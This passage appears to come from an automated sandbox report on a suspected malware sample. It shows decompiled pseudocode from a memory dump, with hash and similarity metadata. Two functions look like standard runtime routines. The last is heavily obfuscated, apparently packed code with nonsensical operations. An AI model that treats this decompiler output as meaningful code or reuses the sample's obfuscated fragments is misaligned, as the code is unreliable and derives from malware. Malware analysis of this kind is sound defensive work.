                            						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                            						_t102 = _t110 + 1;
                            						do {
                            							_t85 =  *_t110;
                            							_t110 = _t110 + 1;
                            							__eflags = _t85;
                            						} while (_t85 != 0);
                            						_t111 = _t110 - _t102;
                            						_t21 = _t95 - 1; // -129
                            						_t86 = _t21;
                            						__eflags = _t111 - _t86;
                            						if(_t111 > _t86) {
                            							_t111 = _t86;
                            						}
                            						E0175F3E0(_t108, _t106, _t111);
                            						_t115 = _t115 + 0xc;
                            						_t103 = _t111 + _t108;
                            						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                            						_t89 = _t95 - _t111;
                            						__eflags = _t89;
                            						_push(0);
                            						if(_t89 == 0) {
                            							L15:
                            							_t109 = 0xc000000d;
                            							goto L16;
                            						} else {
                            							__eflags = _t89 - 0x7fffffff;
                            							if(_t89 <= 0x7fffffff) {
                            								L16:
                            								 *(_t114 - 0x94) = _t109;
                            								__eflags = _t109;
                            								if(_t109 < 0) {
                            									__eflags = _t89;
                            									if(_t89 != 0) {
                            										 *_t103 = 0;
                            									}
                            									L26:
                            									 *(_t114 - 0xa0) = _t109;
                            									 *(_t114 - 4) = 0xfffffffe;
                            									__eflags = _t109;
                            									if(_t109 >= 0) {
                            										L31:
                            										_t98 = _t108;
                            										_t39 = _t98 + 1; // 0x1
                            										_t106 = _t39;
                            										do {
                            											_t69 =  *_t98;
                            											_t98 = _t98 + 1;
                            											__eflags = _t69;
                            										} while (_t69 != 0);
                            										_t99 = _t98 - _t106;
                            										__eflags = _t99;
                            										L34:
                            										_t70 =  *[fs:0x30];
                            										__eflags =  *((char*)(_t70 + 2));
                            										if( *((char*)(_t70 + 2)) != 0) {
                            											L40:
                            											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                            											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                            											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                            											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                            											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                            											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                            											 *(_t114 - 4) = 1;
                            											_push(_t114 - 0x74);
                            											L0176DEF0(_t99, _t106);
                            											 *(_t114 - 4) = 0xfffffffe;
                            											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                            											goto L3;
                            										}
                            										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                            										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                            											goto L40;
                            										}
                            										_push( *((intOrPtr*)(_t114 + 8)));
                            										_push( *((intOrPtr*)(_t114 - 0x9c)));
                            										_push(_t99 & 0x0000ffff);
                            										_push(_t108);
                            										_push(1);
                            										_t101 = E0175B280();
                            										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                            										if( *((char*)(_t114 + 0x14)) == 1) {
                            											__eflags = _t101 - 0x80000003;
                            											if(_t101 == 0x80000003) {
                            												L0175B7E0(1);
                            												_t101 = 0;
                            												__eflags = 0;
                            											}
                            										}
                            										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                            										goto L4;
                            									}
                            									__eflags = _t109 - 0x80000005;
                            									if(_t109 == 0x80000005) {
                            										continue;
                            									}
                            									break;
                            								}
                            								 *(_t114 - 0x90) = 0;
                            								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                            								_t91 = E0175E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                            								_t115 = _t115 + 0x10;
                            								_t104 = _t91;
                            								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                            								__eflags = _t104;
                            								if(_t104 < 0) {
                            									L21:
                            									_t109 = 0x80000005;
                            									 *(_t114 - 0x90) = 0x80000005;
                            									L22:
                            									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                            									L23:
                            									 *(_t114 - 0x94) = _t109;
                            									goto L26;
                            								}
                            								__eflags = _t104 - _t92;
                            								if(__eflags > 0) {
                            									goto L21;
                            								}
                            								if(__eflags == 0) {
                            									goto L22;
                            								}
                            								goto L23;
                            							}
                            							goto L15;
                            						}
                            					}
                            					__eflags = _t109;
                            					if(_t109 >= 0) {
                            						goto L31;
                            					}
                            					__eflags = _t109 - 0x80000005;
                            					if(_t109 != 0x80000005) {
                            						goto L31;
                            					}
                            					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                            					_t38 = _t95 - 1; // -129
                            					_t99 = _t38;
                            					goto L34;
                            				}
                            				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                            					__eflags = __edx - 0x65;
                            					if(__edx != 0x65) {
                            						goto L2;
                            					}
                            					goto L6;
                            				}
                            				L2:
                            				_push( *((intOrPtr*)(_t114 + 8)));
                            				_push(_t106);
                            				if(E0175A890() != 0) {
                            					goto L6;
                            				}
                            				goto L3;
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: _vswprintf_s
                            • String ID:
                            • API String ID: 677850445-0
                            • Opcode ID: b2fc72e043c28a650a35221d5743ab0ca574f9f3fe75233f64251a4119d2980a
                            • Instruction ID: 7202d5f0246a36b30073642059fa3c9db707c99d7acdbc40780033c1577b153b
                            • Opcode Fuzzy Hash: b2fc72e043c28a650a35221d5743ab0ca574f9f3fe75233f64251a4119d2980a
                            • Instruction Fuzzy Hash: A951DF71E1025A8FEF31CF68C848BAEFBB1AF05710F1141ADE85AAB286D7744941DF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E0173B944(signed int* __ecx, char __edx) {
                            				signed int _v8;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v28;
                            				signed int _v32;
                            				char _v36;
                            				signed int _v40;
                            				intOrPtr _v44;
                            				signed int* _v48;
                            				signed int _v52;
                            				signed int _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				intOrPtr _v76;
                            				char _v77;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr* _t65;
                            				intOrPtr _t67;
                            				intOrPtr _t68;
                            				char* _t73;
                            				intOrPtr _t77;
                            				intOrPtr _t78;
                            				signed int _t82;
                            				intOrPtr _t83;
                            				void* _t87;
                            				char _t88;
                            				intOrPtr* _t89;
                            				intOrPtr _t91;
                            				void* _t97;
                            				intOrPtr _t100;
                            				void* _t102;
                            				void* _t107;
                            				signed int _t108;
                            				intOrPtr* _t112;
                            				void* _t113;
                            				intOrPtr* _t114;
                            				intOrPtr _t115;
                            				intOrPtr _t116;
                            				intOrPtr _t117;
                            				signed int _t118;
                            				void* _t130;
                            
                            				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                            				_v8 =  *0x180d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                            				_t112 = __ecx;
                            				_v77 = __edx;
                            				_v48 = __ecx;
                            				_v28 = 0;
                            				_t5 = _t112 + 0xc; // 0x575651ff
                            				_t105 =  *_t5;
                            				_v20 = 0;
                            				_v16 = 0;
                            				if(_t105 == 0) {
                            					_t50 = _t112 + 4; // 0x5de58b5b
                            					_t60 =  *__ecx |  *_t50;
                            					if(( *__ecx |  *_t50) != 0) {
                            						 *__ecx = 0;
                            						__ecx[1] = 0;
                            						if(E01737D50() != 0) {
                            							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            						} else {
                            							_t65 = 0x7ffe0386;
                            						}
                            						if( *_t65 != 0) {
                            							L017E8CD6(_t112);
                            						}
                            						_push(0);
                            						_t52 = _t112 + 0x10; // 0x778df98b
                            						_push( *_t52);
                            						_t60 = L01759E20();
                            					}
                            					L20:
                            					_pop(_t107);
                            					_pop(_t113);
                            					_pop(_t87);
                            					return L0175B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                            				}
                            				_t8 = _t112 + 8; // 0x8b000cc2
                            				_t67 =  *_t8;
                            				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                            				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                            				_t108 =  *(_t67 + 0x14);
                            				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                            				_t105 = 0x2710;
                            				asm("sbb eax, edi");
                            				_v44 = _t88;
                            				_v52 = _t108;
                            				_t60 = L0175CE00(_t97, _t68, 0x2710, 0);
                            				_v56 = _t60;
                            				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                            					L3:
                            					 *(_t112 + 0x44) = _t60;
                            					_t105 = _t60 * 0x2710 >> 0x20;
                            					 *_t112 = _t88;
                            					 *(_t112 + 4) = _t108;
                            					_v20 = _t60 * 0x2710;
                            					_v16 = _t60 * 0x2710 >> 0x20;
                            					if(_v77 != 0) {
                            						L16:
                            						_v36 = _t88;
                            						_v32 = _t108;
                            						if(E01737D50() != 0) {
                            							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            						} else {
                            							_t73 = 0x7ffe0386;
                            						}
                            						if( *_t73 != 0) {
                            							_t105 = _v40;
                            							L017E8F6A(_t112, _v40, _t88, _t108);
                            						}
                            						_push( &_v28);
                            						_push(0);
                            						_push( &_v36);
                            						_t48 = _t112 + 0x10; // 0x778df98b
                            						_push( *_t48);
                            						_t60 = L0175AF60();
                            						goto L20;
                            					} else {
                            						_t89 = 0x7ffe03b0;
                            						do {
                            							_t114 = 0x7ffe0010;
                            							do {
                            								_t77 =  *0x1808628; // 0x0
                            								_v68 = _t77;
                            								_t78 =  *0x180862c; // 0x0
                            								_v64 = _t78;
                            								_v72 =  *_t89;
                            								_v76 =  *((intOrPtr*)(_t89 + 4));
                            								while(1) {
                            									_t105 =  *0x7ffe000c;
                            									_t100 =  *0x7ffe0008;
                            									if(_t105 ==  *_t114) {
                            										goto L8;
                            									}
                            									asm("pause");
                            								}
                            								L8:
                            								_t89 = 0x7ffe03b0;
                            								_t115 =  *0x7ffe03b0;
                            								_t82 =  *0x7FFE03B4;
                            								_v60 = _t115;
                            								_t114 = 0x7ffe0010;
                            								_v56 = _t82;
                            							} while (_v72 != _t115 || _v76 != _t82);
                            							_t83 =  *0x1808628; // 0x0
                            							_t116 =  *0x180862c; // 0x0
                            							_v76 = _t116;
                            							_t117 = _v68;
                            						} while (_t117 != _t83 || _v64 != _v76);
                            						asm("sbb edx, [esp+0x24]");
                            						_t102 = _t100 - _v60 - _t117;
                            						_t112 = _v48;
                            						_t91 = _v44;
                            						asm("sbb edx, eax");
                            						_t130 = _t105 - _v52;
                            						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                            							_t88 = _t102 - _t91;
                            							asm("sbb edx, edi");
                            							_t108 = _t105;
                            						} else {
                            							_t88 = 0;
                            							_t108 = 0;
                            						}
                            						goto L16;
                            					}
                            				} else {
                            					if( *(_t112 + 0x44) == _t60) {
                            						goto L20;
                            					}
                            					goto L3;
                            				}
                            			}

                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0173B9A5
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 885266447-0
                            • Opcode ID: de723ecd38c3e9e27dd2351c8ce0e938ce7f2dacb5b04cfcae339b29a57f695e
                            • Instruction ID: 9f9cc541580fde1128c60e0c09d6bb4e6d222c39b3693de742ad3f518324d434
                            • Opcode Fuzzy Hash: de723ecd38c3e9e27dd2351c8ce0e938ce7f2dacb5b04cfcae339b29a57f695e
                            • Instruction Fuzzy Hash: 62518771A08705CFC725CF68C48492AFBE5FBC8610F14896EFA958735ADB70E940CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 69%
                            			E00A9D5AD(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                            				signed int _t49;
                            
                            				_t49 = __eax;
                            				_push(__edi);
                            				 *0x3f8f272f =  *0x3f8f272f << 0x88;
                            				if( *0x3f8f272f >= 0) {
                            					asm("rcl dword [0xcf46d70], 0xc");
                            					asm("rol byte [0xca777de3], 0x6f");
                            					__ebp = __ebp + 1;
                            					asm("adc edx, [0x9ee99494]");
                            					__esi = __esi - 1;
                            					__eflags = __esi;
                            					if(__esi != 0) {
                            						goto L1;
                            					}
                            					 *0xc508c475 =  *0xc508c475 ^ __ecx;
                            					 *0xce2ed4d4 =  *0xce2ed4d4 | __ebp;
                            					 *0x51d4428 =  *0x51d4428 << 0x40;
                            					asm("sbb edi, [0x823161c4]");
                            					asm("cmpsw");
                            					 *0x9518560d =  *0x9518560d - __eax;
                            					 *0xf63bbbb7 =  *0xf63bbbb7 << 0x89;
                            					__esp = __esp |  *0x39426621;
                            					 *0x913f49f =  *0x913f49f << 0x61;
                            					__edx = __edx + 0xa2903bd;
                            					_t1 = __ebp;
                            					__ebp =  *0xbc01a7bc;
                            					 *0xbc01a7bc = _t1;
                            					__eflags = __esp -  *0xf985c619;
                            					if(__esp >  *0xf985c619) {
                            						goto L1;
                            					}
                            					_push(0xefa36a77);
                            					 *0x910e8d0 =  *0x910e8d0 | __al;
                            					__eflags =  *0x28ab4428 & __ah;
                            					if(( *0x28ab4428 & __ah) >= 0) {
                            						goto L1;
                            					}
                            					__esp =  *0x71b66f7d * 0x598a;
                            					__eflags =  *0x98cb17f4 & __esp;
                            					_push(0x19090a89);
                            					__edi = __edi | 0x1662b736;
                            					__eflags = __edi;
                            					if(__edi <= 0) {
                            						goto L1;
                            					}
                            					__ecx = __ecx | 0x3aa14776;
                            					asm("rcl dword [0x32251509], 0x39");
                            					asm("lodsb");
                            					_pop(__eax);
                            					asm("rcr byte [0xf5dcbf6], 0x23");
                            					__eflags = __eax - 0x29c20405;
                            					_pop(__eax);
                            					asm("cmpsw");
                            					__eflags = __dh -  *0x7556ba0a;
                            					__ebx = __ebx |  *0x6aa5a49c;
                            					asm("rcr dword [0xa3af0c2], 0xd1");
                            					_t6 = __ebx;
                            					__ebx =  *0xd8eab796;
                            					 *0xd8eab796 = _t6;
                            					asm("rcl dword [0xc281f981], 0x19");
                            					asm("rol dword [0xa0f3af1], 0x7");
                            					_push( *0xfc5717bc);
                            					__esp = __esp |  *0xfea5f72d;
                            					_push( *0x55f71dfe);
                            					__esi =  *0x6e12c38f;
                            					asm("adc al, [0xe003fba0]");
                            					__al = __al - 0xf9;
                            					__eflags = __al;
                            					if(__al >= 0) {
                            						goto L1;
                            					}
                            					asm("sbb [0xf282b173], esi");
                            					__ecx = __ecx + 1;
                            					 *0x76ddd7e1 =  *0x76ddd7e1 >> 0x12;
                            					asm("adc [0x2b7317f9], bl");
                            					asm("sbb al, [0x46bdbd0a]");
                            					__eax = __eax -  *0xe5caf911;
                            					 *0xdf1ead2 =  *0xdf1ead2 >> 0xa2;
                            					__ebx = __ebx +  *0x8454ab07;
                            					_t7 = __ecx;
                            					__ecx =  *0x25847d81;
                            					 *0x25847d81 = _t7;
                            					__eax = __eax +  *0xea778bd5;
                            					__eflags = __eax;
                            					asm("sbb ecx, [0x74f8b6fc]");
                            					if(__eax > 0) {
                            						goto L1;
                            					}
                            					__edi =  *0xefd8f47f * 0xce63;
                            					asm("lodsd");
                            					 *0xe8c42ac2 =  *0xe8c42ac2 - __edx;
                            					asm("sbb [0xcaf10b12], ah");
                            					asm("adc ebp, [0x7a66b326]");
                            					asm("ror dword [0x253d3897], 0xa5");
                            					 *0xf66afc6c =  *0xf66afc6c & __edi;
                            					_push( *0x491e290e);
                            					__ecx =  *0x15eea39d;
                            					_push( *0xc0ee480f);
                            					__cl =  *0xfc5310ca;
                            					__eflags = __esp - 0x3d68a6cd;
                            					asm("sbb esp, [0x21cce1c0]");
                            					__ecx = __ebx;
                            					asm("rol byte [0x829041b4], 0xc4");
                            					__cl =  *0xfc5310ca &  *0x2590fa84;
                            					 *0x8aa02bb7 =  *0x8aa02bb7 ^ __bh;
                            					__ebx = __ebx ^  *0x71777cc2;
                            					asm("ror dword [0x43bfc492], 0xaa");
                            					__bh = __bh -  *0xfe6d10b2;
                            					asm("sbb esi, [0x82f7f7]");
                            					__ecx =  *0x15eea39d - 1;
                            					asm("adc [0xbbe0db13], ebp");
                            					__esi = __esi &  *0x59c70bde;
                            					asm("rol dword [0x4c2b7191], 0xb1");
                            					_push( *0x139c796f);
                            					asm("sbb esi, 0xcb43c3ce");
                            					_pop(__edx);
                            					 *0x583a8686 =  *0x583a8686 ^ __bh;
                            					__eflags =  *0x583a8686;
                            					asm("sbb ch, [0xd91b60a0]");
                            					asm("scasd");
                            					if( *0x583a8686 != 0) {
                            						goto L1;
                            					}
                            					__ebp = __ebp |  *0x310bb7b;
                            					__esi = __esi | 0x27d517ba;
                            					__eflags = __esi;
                            					asm("adc edi, [0x13d3201b]");
                            					if(__esi == 0) {
                            						goto L1;
                            					}
                            					 *0x857d774 =  *0x857d774 & __ebx;
                            					__dl = __dl - 0xe3;
                            					__edx = __edx -  *0x517fb098;
                            					asm("sbb bh, [0x7945aa34]");
                            					asm("adc esp, [0x2c9721bd]");
                            					__edx =  *0x44f216a * 0xbf8;
                            					__eflags = __edx;
                            					asm("rol dword [0xab0e0985], 0x75");
                            					 *0xea70c6d1 =  *0xea70c6d1 >> 0xc0;
                            					if(__edx != 0) {
                            						goto L1;
                            					}
                            					asm("adc edi, 0xb0f9a7b");
                            					__eflags =  *0x8a3fc50b & __ebp;
                            					__edi = __edi - 1;
                            					__ebx =  *0xf972166b * 0xa86a;
                            					__eflags =  *0x751b6a0b & __edx;
                            					__ebx =  *0xf972166b * 0xa86a -  *0x1d855a67;
                            					__eflags = __ebx;
                            					if(__ebx >= 0) {
                            						goto L1;
                            					}
                            					__eflags =  *0xa86af973 & __esp;
                            					asm("adc [0x32ef860e], ebp");
                            					__edi = __edi + 1;
                            					__al = __al | 0x0000000c;
                            					__eflags = __al;
                            					if(__eflags >= 0) {
                            						goto L1;
                            					}
                            					asm("adc [0x2c741b71], esi");
                            					asm("adc [0xae94fb94], edx");
                            					if(__eflags != 0) {
                            						goto L1;
                            					}
                            					__edx = __edx - 0x971d0e7b;
                            					 *0xc5c114f1 =  *0xc5c114f1 << 0xf;
                            					_push(__eax);
                            					 *0xa339af6c =  *0xa339af6c << 0x92;
                            					__eflags = __ebx - 0x127b8606;
                            					asm("adc [0x6241f423], esp");
                            					asm("adc ah, [0xa87ba14]");
                            					__ecx = __ecx |  *0x7d97736f;
                            					asm("rol dword [0x68affee], 0xb0");
                            					 *0x5b127317 =  *0x5b127317 + __edi;
                            					__ch = __ch -  *0x3412c130;
                            					 *0xaf8237ba =  *0xaf8237ba >> 0x7e;
                            					__eflags = __esp -  *0x6fa3c53e;
                            					asm("sbb [0x16f984d6], esp");
                            					if(__esp >=  *0x6fa3c53e) {
                            						goto L1;
                            					}
                            					 *0x52fa0d73 = __esp;
                            					asm("rcl dword [0xf0747f65], 0x6f");
                            					__eflags =  *0x1935f9c0 & __ebx;
                            					__ebp = __ebp -  *0x10f4921f;
                            					__edx = __edx + 0xb561cbf8;
                            					__edi =  *0xb6439f85;
                            					__esi =  *0xfa93836b * 0xa3d7;
                            					_t16 = __ecx;
                            					__ecx =  *0xf61289b8;
                            					 *0xf61289b8 = _t16;
                            					 *0xef27cfa3 =  *0xef27cfa3 << 0xbf;
                            					 *0x61f06c95 =  *0x61f06c95 | __ebp;
                            					__esi =  *0xfa93836b * 0xa3d7 -  *0x413678c2;
                            					__eflags = __esi;
                            					if(__esi == 0) {
                            						goto L1;
                            					}
                            					__esi = __esi &  *0xee9b0f74;
                            					__eflags = __esi;
                            					if(__esi >= 0) {
                            						goto L1;
                            					}
                            					asm("rcr dword [0xa59b4b73], 0x22");
                            					__ebx = __ebx ^  *0x400c8ff8;
                            					asm("ror dword [0xafc7946d], 0xef");
                            					__eflags = __esp & 0x6bd6ff98;
                            					 *0xba29110c =  *0xba29110c >> 0x6f;
                            					__edi - 0xa90ec93f =  *0x33997dda & __ebp;
                            					L1();
                            					__eflags =  *0x810178e8 & __esp;
                            					_pop(__ebp);
                            					if(__eflags > 0) {
                            						goto L1;
                            					}
                            					__ebp = __ebp +  *0xa7a30077;
                            					__eflags =  *0x9eabd8c2 - __ebp;
                            					asm("adc ebp, 0x8c2309fe");
                            					asm("rcr byte [0x2024de8a], 0x67");
                            					__esp =  *0xf542e960 * 0x19ff;
                            					__ebx = __ebx ^  *0xdae074f4;
                            					__eax = __eax |  *0x2e22436e;
                            					__eflags = __eax;
                            					if(__eax != 0) {
                            						goto L1;
                            					}
                            					__eflags =  *0x6a15257a & __ecx;
                            					asm("adc [0x786d89fa], ecx");
                            					_push(__ebx);
                            					 *0xa94e49cd =  *0xa94e49cd & __ebp;
                            					__eflags =  *0xa94e49cd;
                            					if( *0xa94e49cd == 0) {
                            						goto L1;
                            					}
                            					__ecx = __ecx ^ 0x2d8a2c74;
                            					__ebp = __ebp + 1;
                            					_pop(__edi);
                            					asm("sbb [0x674eae06], esi");
                            					 *0x47762e1c =  *0x47762e1c >> 0xea;
                            					asm("adc ecx, 0xeeff039");
                            					__eax = 0xed0e2a39;
                            					__eflags = __edx - 0x6f794b6e;
                            					__esp = __esp ^  *0x76868917;
                            					_push(__ebp);
                            					asm("sbb bl, [0xfed9c2e0]");
                            					asm("adc al, 0x14");
                            					 *0x301aab9e =  *0x301aab9e + __edx;
                            					__bl = __bl ^ 0x000000b3;
                            					__eflags = __bl;
                            					if(__bl >= 0) {
                            						goto L1;
                            					}
                            					__eax = 0xed0e2a39 &  *0xeb9b9d73;
                            					__bl = __bl -  *0x41173ea0;
                            					__ebx = __ebx - 0x54d82394;
                            					__esi = __esi + 0xc5df9a81;
                            					 *0x84a0b7f9 =  *0x84a0b7f9 + __bl;
                            					__ah = __ah ^  *0x85d4d3a0;
                            					 *0xf5c7d2f6 =  *0xf5c7d2f6 ^ __ch;
                            					__eflags =  *0xf5c7d2f6;
                            					_push( *0xfabc0661);
                            					__bl = 0x20;
                            					 *0x70a2941d =  *0x70a2941d >> 0x9a;
                            					if( *0xf5c7d2f6 <= 0) {
                            						goto L1;
                            					}
                            					__ecx =  *0x4bf2b57e * 0x10da;
                            					asm("adc [0xc1365663], al");
                            					asm("rcl dword [0x387544db], 0x5");
                            					 *0xe16f4bc7 =  *0xe16f4bc7 | __ebx;
                            					__eflags =  *0xe16f4bc7;
                            					if( *0xe16f4bc7 >= 0) {
                            						goto L1;
                            					}
                            					__esi =  *0xe36f1a7d * 0x20b8;
                            					__ecx = __ecx ^  *0x9a21471d;
                            					__al = __al ^ 0x0000000a;
                            					__esi = 0xa60515f3;
                            					_push( *0xa74f24cd);
                            					__edx = __edx -  *0x3fefda05;
                            					asm("cmpsw");
                            					__ebx = __ebx ^  *0x4bf3d205;
                            					__ecx =  *0x3a05a764;
                            					__esp = __edi;
                            					__esi = 0xa60515f3 ^  *0x5a750f5;
                            					asm("sbb [0xa74ef163], cl");
                            					__ecx =  *0x4df2e205;
                            					 *0x4df2e205 =  *0x3a05a764;
                            					__esi = __edx;
                            					asm("cmpsw");
                            					 *0x96e58303 =  *0x96e58303 - __edi;
                            					 *0xc0476904 =  *0xc0476904 << 0xe9;
                            					 *0xc2750464 =  *0xc2750464 << 4;
                            					asm("rcl dword [0xc70464c7], 0xee");
                            					_t26 = __esp;
                            					__esp =  *0x464bd98;
                            					 *0x464bd98 = _t26;
                            					__eflags =  *0x64bf992c - __dh;
                            					asm("adc eax, 0x46ef1d05");
                            					__ebx =  *0xcd05a76a * 0x5923;
                            					_push( *0x3405a764);
                            					__eflags = __ecx & 0xa7625001;
                            					 *0x9c652107 =  *0x9c652107 >> 0xa;
                            					 *0x4b01fcee =  *0x4b01fcee << 0xa;
                            					 *0xd68a1707 =  *0xd68a1707 >> 0xe;
                            					 *0x4bff0111 & __edi = 0xffffffff84051403;
                            					__esi = 0xa60515f3 ^  *0x5a750f5 |  *0x4b050feb;
                            					__eflags =  *0x41c20507 - __edi;
                            					 *0x4bfd5284 =  *0x4bfd5284 >> 0x76;
                            					__eflags = __ch -  *0x930d9f08;
                            					__cl = __cl ^ 0x000000c6;
                            					__ebx =  *0xcd05a76a * 0x5923 -  *0x1d6cfddd;
                            					__ch = __ch | 0x00000008;
                            					__esi = (0xa60515f3 ^  *0x5a750f5 |  *0x4b050feb) +  *0xb0085bd;
                            					__dl = __dl -  *0x1d66d0b0;
                            					asm("sbb bh, [0xe2c97308]");
                            					_t33 = __edx;
                            					__edx =  *0x73f3f20e;
                            					 *0x73f3f20e = _t33;
                            					__eflags =  *0x75ad081d - __edi;
                            					asm("rcl byte [0xac8cf9e0], 0x57");
                            					_pop(__edx);
                            					asm("adc [0xd702091d], ebx");
                            					__eax = __eax ^ 0x41255b31;
                            					__dh = __dh;
                            					_t34 = __ecx;
                            					__ecx =  *0x49090f87;
                            					 *0x49090f87 = _t34;
                            					__esp =  *0x464bd98 - 0x8b97860d;
                            					__eflags =  *0xf8f031d & __edi;
                            					__esi = 0xcf38d09;
                            					 *0xfa19b002 =  *0xfa19b002 - __bh;
                            					__esp =  *0x464bd98 - 0x8b97860d | 0xc30a0f8c;
                            					asm("sbb edx, 0x6ea279ed");
                            					__edx =  *0x73f3f20e &  *0xde775cdf;
                            					 *0xaee20b3a =  *0xaee20b3a - __cl;
                            					asm("adc [0xc5db452f], esi");
                            					asm("sbb bl, 0xd2");
                            					 *0xa8af4b68 =  *0xa8af4b68 + __ebx;
                            					asm("rol byte [0x17d72708], 0xe4");
                            					__eax =  *0x72f1f63d;
                            					__ecx =  *0x3913111d;
                            					 *0x81ed07a0 =  *0x81ed07a0 ^ __bh;
                            					__eflags =  *0x81ed07a0;
                            					 *0x61ef05e6 =  *0x61ef05e6 >> 0xb9;
                            					__esi = 0xeaaa4bdc;
                            					if( *0x81ed07a0 < 0) {
                            						goto L1;
                            					}
                            					__eflags =  *0x14549472 - __eax;
                            					asm("adc ecx, [0xd293598f]");
                            					if( *0x14549472 != __eax) {
                            						goto L1;
                            					}
                            					 *0x8631807a =  *0x8631807a + __edx;
                            					__ecx = 0xe02e0a3e;
                            					_push(__ebx);
                            					__eflags =  *0xd5c56cc5 & __eax;
                            					_push( *0x12c71bea);
                            					_push( *0x433b0cea);
                            					asm("rol byte [0x621a60e0], 0x40");
                            					asm("adc edx, [0x8ac77606]");
                            					__eflags = __esp - 0x7cc40fe;
                            					 *0xfd0b730d = __eax;
                            					__ebx -  *0x183218d1 = __edx & 0x2bafe135;
                            					asm("adc edx, [0x5806a89a]");
                            					if((__edx & 0x2bafe135) > 0) {
                            						goto L1;
                            					}
                            					__esi = 0xeaaa4bdc |  *0x9f16b377;
                            					__bl = 0;
                            					 *0x929ec60c =  *0x929ec60c & __bh;
                            					_pop( *0x3e05d1f0);
                            					__ebp = __ebp + 1;
                            					__bh = __bh &  *0x7c42ae7;
                            					__eax = __eax + 0xf4d9ad06;
                            					__eflags =  *0x164bc2cb & 0xe02e0a3e;
                            					 *0xc59f0ef9 =  *0xc59f0ef9 >> 0x7a;
                            					 *0x9674e66d =  *0x9674e66d << 0x2d;
                            					 *0xec95919d =  *0xec95919d >> 0xdd;
                            					__eflags =  *0xe9bef314 & __bh;
                            					__ebp = __ebp ^  *0xa6bfe2f;
                            					__eflags = __edi -  *0x1711bcce;
                            					 *0x768252cb = __edx;
                            					asm("adc al, [0x2500c5f6]");
                            					__ecx = 0xe02e0a3e &  *0x466980c1;
                            					asm("rol dword [0x5451b3d3], 0xcc");
                            					__ch = __ch - 0x1c;
                            					 *0x4ff72601 =  *0x4ff72601 & __esp;
                            					__eflags =  *0x4ff72601;
                            					__bl =  *0x987cb020;
                            					if( *0x4ff72601 <= 0) {
                            						goto L1;
                            					}
                            					 *0xe9c9376 =  *0xe9c9376 | __ebp;
                            					 *0x7bda4f4 =  *0x7bda4f4 >> 0x27;
                            					 *0xec9cfbc =  *0xec9cfbc >> 7;
                            					__eflags = __ebx - 0x4cc0599b;
                            					__eax = __eax + 1;
                            					 *0x10a2d362 =  *0x10a2d362 >> 5;
                            					__eflags =  *0x85814e8f - 0xeaaa4bdc;
                            					_pop(__edx);
                            					__ecx = 0xed012f6e;
                            					_push(__eax);
                            					__edi = __edi + 0xe0d83ece;
                            					__edx = __edx &  *0x2d2289fe;
                            					__ah = __ah ^ 0x000000d2;
                            					__eflags = __ah;
                            					asm("rcr dword [0x86ea15d1], 0xa6");
                            					if(__ah < 0) {
                            						goto L1;
                            					}
                            					__eax = __eax +  *0x811e6070;
                            					 *0x87301a28 =  *0x87301a28 >> 0xd6;
                            					asm("adc al, 0x3c");
                            					asm("scasb");
                            					__ch = __ch | 0x000000b6;
                            					asm("rol byte [0xa1875e14], 0xed");
                            					__al = __al ^  *0xf7899518;
                            					__edx = __edx + 1;
                            					__esi = __esi |  *0x589af96f;
                            					__edx = __edx ^  *0x9a4c51b8;
                            					__bh =  *0xbbaa1534;
                            					__edi = __edi &  *0x88f84931;
                            					__edi = __edi + 0xceb115db;
